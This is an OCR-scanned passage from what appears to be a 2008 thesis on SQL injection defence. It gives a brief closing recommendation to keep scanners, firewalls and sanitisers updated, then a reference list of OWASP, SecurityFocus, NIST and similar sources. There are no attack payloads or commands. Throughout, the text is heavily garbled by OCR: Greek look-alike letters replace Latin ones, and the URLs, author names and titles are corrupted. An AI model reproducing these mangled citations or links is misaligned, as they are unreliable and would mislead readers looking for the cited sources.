inteι·faces
ίη faΓ
m01·e higl1eΓ level ίη
between database and
appl ication paΓt. Jntι-ud eι·s can as well manipulate tl1ose inteι-faces too. And οΓ cοιιΓse
a tl·eqιιe11t ιιpdate of all tl1e patteιη based tools (SQL injection vιιlneΙ"ability detecto ι·s,
Antivinιs, Γ-ϊrewall s,
sanitization tools etc.) sl1all be peΙ"fOΓmed 011 a regιιlaJ" basis ίη
ιnai11te11a11ce wί11dows, jιιst any other ι·egulaι· ιηaintenance proceduι·e.
T11e geneι·al
secιιι·ity aspect: "accept known good, Γ~ject known bad, sanitize" shall be followed ίη
any case.
46
7
REFERENCES
[Ι]
11ttp://WW\.v.secιιΓityfocu s .com/inrocus/ J 709,
Applications (Part Two) Jody
Melboιιrne
Penetration Testing
fοι·
Web
and Dαvid .!οπn 2003-07-03 ,
accessed 011 03/08
[2]
http://ww\.v. secιιΓit yfocιιs . con1/infocυs/ l 704, Penetι·ation
Testing
fοΓ
Web
Applications ( Pa Γt One) .Jody MelbouΓne and Daνid Joι·n1 2003 -07-03 ,
accessed 011 03/08
[3 J
l1ttp: //www.sg l secιιΓity.co111
[4]
http://www. sgl-server-peΓfoΓmance.con1/
accessed
[5]
[6)
οη
, accessed 011 03/2008
, SQL
seι·veι·
Γel ated
articles,
03/08
http://www .11 ex tμe n ss.co 1η/paρe1·s/ειdva 11 ce d
sgl
lnj ection rn SQL SeΓνeι· Applicaιions ,
An ley tchTi s@ngssoftwaι·e.con1)
ChΓis
i11j ection.pclΓ
Advanced SQL
l 1ttp: //www.sρyιi ynan1ic s.co 1η/ι')~φe Γs/S QLJ 11jectio11 WhitePapeΓ.pdi"
Αι·e yοLΙ Γ
web applications vιι ln eι·able? Kevin Spett, accessed
οη
03/08
[7]
llttp: //tec l1net. 111iCl'osoΓt.co ιn/en-us/l ibι·aιΎ/ms 1 6 1 953 .aspx, accessed ο η
[8]
IHtp: /Λνww.acunetix.coιη/"νebs itesccιΙΓitv/sgl-injection.htm
,
03/08
accessed
on
accessed
οη
03/08
[9]
J1 ttp: //"vww.acιιnetix . coιη/websitesecurityΛνebapp-secu Γity.htιη ,
03/08
[ Ι ΟJ
l1ttp: //w\.vw .owHsρ .onr/ i11dex .pJ1p/Main
Pωjecι ,
[ 11]
1>age , Open Web
Apρlication Secιιι·iιy
accessed on 06/08
l11tp ://www.o wειsρ.0 Γg/ i11 cl cx .pl1p/[~cviewi11g
Codc fol'
sοι
Injection
Reviewing Code fοΓ SQL lnjection, Open Web Application Security Pωject,
OWASI\ accessed on 06/08
[Ι 21 11ttρ://www.owειsp.oι·g/indcx.phpfΓesting tοΓ
SQL lnj ection , Testing ίοι·
SQL Jn.iection, Open Web Application Secuι·ity PιΌject, OWASP, accessed on
06/08
47
[ 13]
l1tιp://www.ownsp.on~/ind ex .phρ/ Blincl
Open Web Application Security Project, OWASP, accessed
[14]
http://ιη sd11.ιηicωsoft.coιη/en-us/libι·a1Ύltηs99827 l .aspx
Fι·om
[ 15]
SQL lnjection in ASP.NET,
anιl
and wl1y it
[ 16]
\"ll1v
ίt ιηatteι·s- 1836.11ιη1 Ι
n1atteι·s,
011
06/08
Το:
How
MicΙΌsoft coφoration,
l1ttp://www.attackpΓevenιion.co1η/aΓticle/SQL
ense
In.ίection ,
SQL lnjection , Blind SQL
PΙΌtect
acccssed on 06/08
lnjection Modes of
aιtack dcΓ
SQL lnjection: Modes of attack, defensc,
accessed on 06/08
hιιp://www.so111111aΓskog.se/dy11an1ic sgl.htιηl#foι·ks
T11e
CuΓse
and Blessings
of Dynan1ic SQL Αη SQL text by Ει·Ι aηd SoιηnlaΓskog, SQL SeΓνeΓ ΜΥ!),
accessed
[ 17)
06/08
/lttρ: //saιηsclass.net/124/ppt/c/111.doc Cοιηιηοn
Zaιko,
[ 18]
011
Exploit Tecl111iques
injection.shtn1I
classificaιion,
accessed
Web Application
Secuι·ity ConsoΓtium,
[ 19]
http:IΛ 1ΙHΙ1v.atlcιc:kιπevenlion.c:o111/Exploit.\'/80L lnjectίon
[20]
l1ttp: //www.appscci11c.coι11/presc11tatio11s/Manipt!lating
lnjection.pdf Manipulating Microsofi SQL
Αιιtlι01·: CesaΓ Ceιτudo, www. appsecinc.coιη
(21]
C.
accessed on 06/08
l1ttρ: //www. webappsec . onifρl'Ojccts/thrcat/classcs/sgl
QΙ,
PeiteΓ
Victoι·
CJ1apela,
SeΓνeι·
Using S
Using SQL Injection,
, accessed on 06/08
l1ttp:/Λ"IWw.oνvasp.0Γg/in1ages/7/74/Advanced
Advanced SQL Injection,
06/08
SQL Injection
SQL
SeινeΓ
οη
ThΓeat
SQL lnjcction.ppt#35
Sm4ι·t Secuι·ity Seι·vices,
OWASP,
accessed 011 06/08
Γ22]
l1ttp: //sea ι·chsglseι·ver.techtarget.coιη/tip/0,2 89483,sid87
gci 1159434,ΟΟ.11tιηl ,
SQL injection tools for aιιton1ated testing, Kevi11 Beaveι', CISSP, 01.16.2006,
accessed 011 06/08
(23 J
http://databases.aboιιt.co111/od/secιιΓitv/a/sgl
inject
test.l1tιη
Testing
Fοι·
SQL
111.jcction Vιιlneι·abiliti es, M ikc Ch:.φplι::, Αl)οιιt.cυιη. accessed οη 06/08
[24 J l11tρ://Γgaucl1eΓ.i11 Γo/woΓklN1ST/Verify07 Slides Fong-Gaιιcheι·.pdf
Testing
Web Application ScanneΓ Tools Elizabeιh Fong and Ron1ain Gaucheι· NIST,
accessed 011 06/08
48
(25)
l1ttp: //www.cc.gatech.cιlu/-wha lΓ0 11d/papeΙ"slha \Γond05a se.pdΓ
Analysis and
Monitoι·ing
toJ"
NEutΙ"alizing
AMNES fA:
SQL!njcction Attacks, Williaπι G.J.
Hal Γοηd a11d AlessandI"O Orso, College of Computing, Georgia
ln stίtιιte
of
Tecl111ology, accessed 011 06/08
[26]
http: //w\ι\rw.coιηιηunities.hp.co111/sec ιιΓitysoftwa rc/blo gs/spilabs/aΓchive/2008/
06/24/tinding-sgl-injection-witl1-scι-avvlΓ.aspx
T11e
ΗΡ SecιιΙ"ity LaboJ"atoιγ,
Publisl1ed 24 Jιιne 2008, accessed 011 06108
(27)
'1ίtp ://www.o,vasp.oι·g/index.plψ/Ca tego ι-y: QW ASP
WebGoat
PΙ"Oj ect
Web
Goat PΓojext, OWASP, accessed on 06108
(28J http://www.owasp.oφ/i11dex.plψ/Cωss Site Sαipting C ι·oss Site Scι-ipting OWASP , accessed 011 06/08
[29 /
hllμ./l.s·andsρι·iιe. ι:on?/8/eιιlhlpaρeι·s/Real J1Ιοι·/d Χ88
David
[301
Ζiι111ηeι·
, accessed
οη
06/08.
http : //www.zyιηic.com /tιιtorial s/php/saniti satio11-and-validation-in-php/
Sanitisntion a11J Vnl idation in
accesscd
(3 Ι]
οη
ΡΙ ΙΡ.
Alcx Eliot ZYMIC
Webmasteι· ι·esoιιι·ses,
06/08
l1ttp: //wvvvν.cc.gatecl1.edu/-wl1a lfo11d/papel's/halfo nι\05ase.pdf'
Analysis and
M onitoι·ing fοΓ NEutι·ali zing
Halfond and
Alessandι·o
Tecl1110\ogy, acccssed
[32]
2./11m/ Real WoΙ"ld XSS,
οη
,
0ΓSΟ,
, AMNES IA:
SQLin.jection Attacks, Willian1 G.J.
College of Computing Georgia lnstitute of
06/08
l1 ιιp ://w,vw.owasp.0Ι"g/index.php/ Data
Yalidation Data validation, OWASP,
accessed 011 06/08
[33 J l1ιιp: //ww\ιv.t l1eι·egi s teΓ.co.uk/2008/06/26/n1iαoson hp sgl injection tools/
ΜίcΙ"Οsο~ aηd ΗΡ
tackle SQL-injection scouΓge, n1odest pl"Oposal, Dan Goodin
ίη San Fι·anci sco Pιιblisl1ed Thιιl'sday 26th June 2008, accessed οη 06/08
49
